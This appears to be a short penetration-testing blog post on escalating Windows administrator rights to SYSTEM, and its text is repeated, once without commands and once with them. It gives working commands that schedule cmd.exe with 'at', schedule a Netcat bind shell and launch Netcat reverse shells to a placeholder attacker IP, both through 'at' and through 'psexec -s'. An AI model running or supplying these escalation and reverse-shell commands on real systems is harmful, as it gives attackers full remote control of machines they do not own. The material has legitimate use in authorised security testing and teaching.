Upgrading Admin to SYSTEM in Windows
Sometimes in an engagement, though you may have administrative privileges, there are some desired commands you do not possess the permissions to execute, or maybe you just want to type "whoami" and see the response "NT AUTHORITY\SYSTEM," designating you master of the machine. Either way, here are a few ways I've found to escalate privileges to SYSTEM once you have administrative privs.
The first is simply to discover current system time, then schedule a CMD session as a system task for a short time down the road. To find the current time:
Then you will schedule the CMD session for a minute or so later, in 24 hr. format:
Sometimes, from within an RDP session, the system shell will not open in the context of your desktop. In that case, this workaround has proven useful to me. In order to do this, you will have to download Netcat to the target if it is not already installed. Then, you schedule as a system task a Netcat listener on localhost with a CMD process attached, as follows:
Then, you connect to the listener with Netcat, and voila! SYSTEM shell.
Here's an example of this in action:
Of course, this also works in spawning a reverse shell:
If you are dealing with any version of Windows that has Powershell installed, an easy method of SYSTEM escalation is to use a tool from the Windows PsTools suite called PsExec. To execute a command as SYSTEM, we run PsExec with the -s flag. The rest is much like the above. We could spawn an interactive command window if we have desktop access, or a remote shell otherwise.
There are no doubt other ways, but these are a few of the ones I've found useful.
The first is simply to discover current system time, then schedule a CMD session as a system task for a short time down the road. To find the current time:
echo %time%
Then you will schedule the CMD session for a minute or so later, in 24 hr. format:
at hh:mm /interactive cmd.exe
Sometimes, from within an RDP session, the system shell will not open in the context of your desktop. In that case, this workaround has proven useful to me. In order to do this, you will have to download Netcat to the target if it is not already installed. Then, you schedule as a system task a Netcat listener on localhost with a CMD process attached, as follows:
at hh:mm nc -l 127.0.0.1 -p 4443 -e cmd.exe
Then, you connect to the listener with Netcat, and voila! SYSTEM shell.
nc -nv 127.0.0.1 4443
Here's an example of this in action:
Of course, this also works in spawning a reverse shell:
at hh:mm nc -nv <attacker ip> <attacker listen port> -e cmd.exe
If you are dealing with any version of Windows that has Powershell installed, an easy method of SYSTEM escalation is to use a tool from the Windows PsTools suite called PsExec. To execute a command as SYSTEM, we run PsExec with the -s flag. The rest is much like the above. We could spawn an interactive command window if we have desktop access, or a remote shell otherwise.
psexec -s <path to nc.exe>\nc -nv <attacker ip> <attacker listen port> -e cmd.exe
There are no doubt other ways, but these are a few of the ones I've found useful.
Comments
Post a Comment